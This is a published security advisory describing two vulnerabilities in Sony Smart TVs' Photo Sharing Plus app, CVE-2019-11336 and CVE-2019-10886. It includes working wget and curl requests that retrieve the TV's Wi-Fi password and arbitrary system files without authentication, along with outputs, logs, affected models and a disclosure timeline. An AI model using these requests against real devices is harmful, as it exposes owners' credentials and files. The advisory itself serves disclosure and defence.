Sony Smart TVs suffer from information disclosure and arbitrary file read vulnerabilities.
3b42bd8fb1eb2d499baf7ea58fa34007
UNCLASSIFIED
## ADVISORY INFORMATION
TITLE: Multiple vulnerabilities in Sony Smart TVs
ADVISORY URL:
https://www.darkmatter.ae/blogs/security-flaws-uncovered-in-sony-smart-tvs/
DATE PUBLISHED: 23/04/2019
AFFECTED VENDORS: Sony
RELEASE MODE: Coordinated release
CVE: CVE-2019-10886, CVE-2019-11336
CVSSv3 for CVE-2019-10886: 6.5 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
CVSSv3 for CVE-2019-11336: 6.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
## PRODUCT DESCRIPTION
Sony Smart TVs are provided with applications - adding more functionalities
for the customers - including the "Photo Sharing Plus" application.
The "Photo Sharing Plus" application running inside the Smart TV contains
several weaknesses. This application allows uploading pictures from Smartphone
to the TVs, in order to display them on a large screen.
When started, Photo Sharing Plus is turning the TV into a Wi-Fi access point
and shows a Wi-Fi password allowing customers to connect and share their media
content on the Sony Smart TVs.
## DETAILS OF VULNERABILITIES
xen1thLabs has found multiple vulnerabilities in Sony products in October 2018
and xen1thLabs coordinated the disclosure of these vulnerabilities with Sony.
Two vulnerabilities have been found in the Sony Smart TVs by xen1thLabs while
auditing the security of Smart TVs.
The first vulnerability allows an attacker - without authentication from the
LAN/Wi-Fi - to retrieve the static Wi-Fi password created by the television
when the Photo Sharing Plus application is started.
The second vulnerability allows an attacker to read arbitrary files located in
the TV without authentication including valuable files.
The summary of the vulnerabilities is:
- CVE-2019-10886 Sony Smart TV Photo Sharing Plus Arbitrary File Read
Vulnerability
- CVE-2019-11336 Sony Smart TV Photo Sharing Plus Information Disclosure
Vulnerability
The number of affected Sony models is very high and Sony has decided to remove
this vulnerable application from all models
(https://www.sony.com/electronics/support/televisions-projectors/articles/00204331).
Sony provided a non-exhaustive list of affected TV models from 2015-2016.
Recent models also are affected:
- KDL-50W800C
- KDL-50W805C
- KDL-50W807C
- KDL-50W809C
- KDL-50W820C
- KDL-55W800C
- KDL-55W805C
- KDL-65W850C
- KDL-65W855C
- KDL-65W857C
- KDL-75W850C
- KDL-75W855C
- XBR-43X830C
- XBR-49X800C
- XBR-49X830C
- XBR-49X835C
- XBR-49X837C
- XBR-49X839C
- XBR-55X805C
- XBR-55X807C
- XBR-55X809C
- XBR-55X810C
- XBR-55X850C
- XBR-55X855C
- XBR-55X857C
- XBR-65X800C
- XBR-65X805C
- XBR-65X807C
- XBR-65X809C
- XBR-65X810C
- XBR-65X850C
- XBR-65X855C
- XBR-65X857C
- XBR-75X850C
- XBR-75X855C
- XBR-55X900C
- XBR-55X905C
- XBR-55X907C
- XBR-65X900C
- XBR-65X905C
- XBR-65X907C
- XBR-65X930C
- XBR-75X910C
- XBR-75X940C
- XBR-75X945C
- XBR-43X800D
- XBR-49X800D
- XBR-49X835D
- XBR-55X850D
- XBR-55X855D
- XBR-55X857D
- XBR-65X850D
- XBR-65X855D
- XBR-65X857D
- XBR-75X850D
- XBR-75X855D
- XBR-75X857D
- XBR-85X850D
- XBR-85X855D
- XBR-85X857D
- XBR-55X930D
- XBR-65X930D
- XBR-65X935D
- XBR-65X937D
- XBR-75X940D
- XBR-100Z9D
- XBR-49X700D
- XBR-55X700D
- XBR-65X750D
- XBR-65Z9D
- XBR-75Z9D
- XBR-43X800E
- XBR-49X800E
- XBR-49X900E
- XBR-55A1E
- XBR-55X800E
- XBR-55X806E
- XBR-55X900E
- XBR-55X930E
- XBR-65A1E
- XBR-65X850E
- XBR-65X900E
- XBR-65X930E
- XBR-75X850E
- XBR-75X900E
- XBR-75X940E
- XBR-77A1E
### 1. CVE-2019-11336 Sony Smart TV Photo Sharing Plus Information Disclosure
Vulnerability
An unauthenticated remote attacker can retrieve the plaintext wireless password
through the "Photo Sharing Plus" API.
After starting the application, the following example retrieves the wireless
password created from the TV (IP address of the TV is 192.168.1.102) over the
LAN, without authentication:
```
root@kali:~# wget -qO- --post-data='{"id":80,"method":"getContentShareServerInfo","params":[],"version":"1.0"}' http://[ip_tv]:10000/contentshare/
{"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/192.168.49.1","touchPadRemote":"notSupported"}],"id":80}
````
The password is 8362tbwX.
By reading logs of the TV, we can confirm the password has been delivered over
HTTP, without authentication. The logs contain password in plain-text:
```
01-01 07:47:23.730 5539 18687 I System.out: [MEXI][D] HttpEndPoint: send: {"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/192.168.49.1","touchPadRemote":"notSupported"}],"id":80}
````
It is also important to note that the generated Wireless password by the TV is
always the same. Even after a hard reboot and a disconnection from the power
supply, the generated password will be always the same. This lack of randomness
is also a security issue.
### 2. CVE-2019-10886 Sony Smart TV Photo Sharing Plus Arbitrary File Read
Vulnerability
It is possible to retrieve internal TV files over HTTP without authentication.
By default, images used by the Photo Sharing Plus application are stored inside
`/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/`.
The application starts an access point on the television and a HTTP daemon is
listening to a TCP port on this WLAN.
Furthermore, this daemon also listens on the LAN side of the television and it
is possible to retrieve these images from the LAN an image using this URL:
http://[ip_tv]:10000/contentshare/image/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/LJYT0010.JPG
Browsing the address http://[ip_tv]:10000/contentshare/image/ allows getting
access to the root directory of the television running Android.
By exploiting this vulnerability, /default.prop (containing Android properties)
can be retrieved via http://192.168.1.102:10000/contentshare/image/default.prop:
```
root@kali:~# curl -v http://192.168.1.102:10000/contentshare/image/default.prop
Trying 192.168.1.102...
TCP_NODELAY set
Connected to 192.168.1.102 (192.168.1.102) port 10000 (#0)
> GET /contentshare/image/default.prop HTTP/1.1
> Host: 192.168.1.102:10000
> User-Agent: curl/7.58.0
> Accept: /
>
< HTTP/1.1 200 OK
< Connection: close
< Content-Length: 591
< Content-Type: application/octet-stream
<
#
# ADDITIONAL_DEFAULT_PROPERTIES
#
ro.secure=1
security.perf_harden=1
ro.allow.mock.location=0
ro.debuggable=0 ro.zygote=zygote32
dalvik.vm.image-dex2oat-Xms=64m
dalvik.vm.image-dex2oat-Xmx=64m
dalvik.vm.dex2oat-Xms=64m dalvik.vm.dex2oat-Xmx=512m
ro.dalvik.vm.native.bridge=0 debug.atrace.tags.enableflags=0
#
# BOOTIMAGE_BUILD_PROPERTIES
#
ro.bootimage.build.date=2016? 11? 14? ??? 15:34:56 JST ro.bootimage.build.date.utc=1479105296 ro.bootimage.build.fingerprint=Sony/BRAVIA_ATV2_PA/BRAVIA_ATV2:6.0.1/MMB29V.S50/1.6.0.06.14.0.00:user/release-keys persist.sys.usb.config=none
Closing connection 0
````
Logs in the TV confirm the /default.prop file has been delivered over HTTP:
```
01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Handle get Uri :/contentshare/image/default.prop
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]getLocalFilePath() start, uri=/contentshare/image/default.prop
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]loadType: /contentshare/image
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]localResPath: /default.prop
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]ext:.prop
01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Content Type :application/octet-stream
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]fileSize:591
01-01 07:46:00.892 5539 18775 D PhotoShareApp: [18775][e]Write to response ... 591
01-01 07:46:00.892 5539 18775 D PhotoShareApp: [18775][e]Write to response completed.
````
## DISCLOSURE TIMELINE
03/10/2018 - Vulnerabilities found
10/10/2018 - Report to Sony - Report to Sony Bug bounty program
through HackerOne
12/10/2018 - Confirmation of the reception of the bug report
15/10/2018 - xen1thLabs explains that the vulnerabilities are also exploitable
over HbbTV (DVB-{S,T,C}) - through HackerOne
29/10/2018 - Sony confirms the vulnerabilities
09/11/2018 - Sony confirms the patches will be available in March 2019 and asks
xen1thLabs to wait until April 2019
29/11/2018 - xen1thLabs sent the slides prior to xen1thLabs's HiTB 2018 Dubai
talk as agreed with Sony
14/01/2019 - Updates requested from xen1thLabs
15/01/2019 - Sony informs xen1thlabs that they are working on patches
27/01/2019 - Updates requested from xen1thLabs
07/03/2019 - Updates requested from xen1thLabs
15/03/2019 - Sony informs xen1thLabs that the agreed date for disclosure is not
possible because they don't know when they will be ready "maybe in a couple of
months"
17/03/2019 - Updates requested from Sony to understand and to publish a
security advisory. xen1thLabs also requests CVEs officially
20/03/2019 - xen1thLabs asks for an acceptable timeline
21/03/2019 - xen1thLabs sent an email to [email protected] due to the lack of
proper communication from Sony and informing Sony that in order to protect
their customers xen1thLabs needs to publish a security advisory
21/03/2019 - Automatic response from [email protected] is no more in use.
22/03/2019 - Sony is working on the patches and confirms the 12th April
26/03/2019 - xen1thLabs confirms the release date of the advisory and asks for
CVEs
01/04/2019 - Sony confirms the vulnerabilities affects some models and
"Sony plans to terminate Photo Sharing Plus service for all of models,
and that completion date is scheduled for April 12th, 2019."
16/04/2019 - Sony only provides one CVE instead of two. Sony states
"the wireless password recovery is within Sony's TV specification and is
expected behavior and Sony will not be submitting for a CVE regarding this"
17/04/2019 - xen1thLabs requests a CVE from MITRE
23/04/2019 - Public disclosure
## SOLUTION
Apply patches provided by Sony
## CREDITS
xen1thLabs - Telecom Lab
## REFERENCES
https://www.darkmatter.ae/blogs/security-flaws-uncovered-in-sony-smart-tvs/
Firmware update to v6.5830 from 01-22-2019 (including security patches?)
https://www.sony.com/electronics/support/downloads/00015771
Firmware update to v6.5830 from 01-22-2019 (not including security patches)
https://www.sony.com/electronics/support/downloads/00015770
End of Photo Sharing Plus 11/22/2018
https://www.sony.com/electronics/support/articles/00204331
https://www.darkmatter.ae/xen1thlabs/
sony-smart-tv-photo-sharing-plus-arbitrary-file-read-vulnerability-xl-19-002/
https://www.darkmatter.ae/xen1thlabs/
sony-smart-tv-photo-sharing-plus-information-disclosure-vulnerability-xl-19-003/
## ABOUT xen1thLabs
xen1thLabs conducts vulnerability research, which feeds in the testing and
validation activities it conducts across software, hardware and
telecommunication.
xen1thLabs houses a team of world-class experts dedicated to providing
high impact capabilities in cyber security.
At xen1thLabs we are committed to uncovering new vulnerabilities that combat
tomorrow's threats today.
More information about xen1thLabs can be found at:
https://www.darkmatter.ae/xen1thlabs/
## WORKING AT xen1thLabs
xen1thLabs is looking for several security researchers across multiple disciplines.
Join a great team of likeminded specialists and enjoy all that UAE has to offer!
If you are interested please visit:
https://www.darkmatter.ae/xen1thlabs/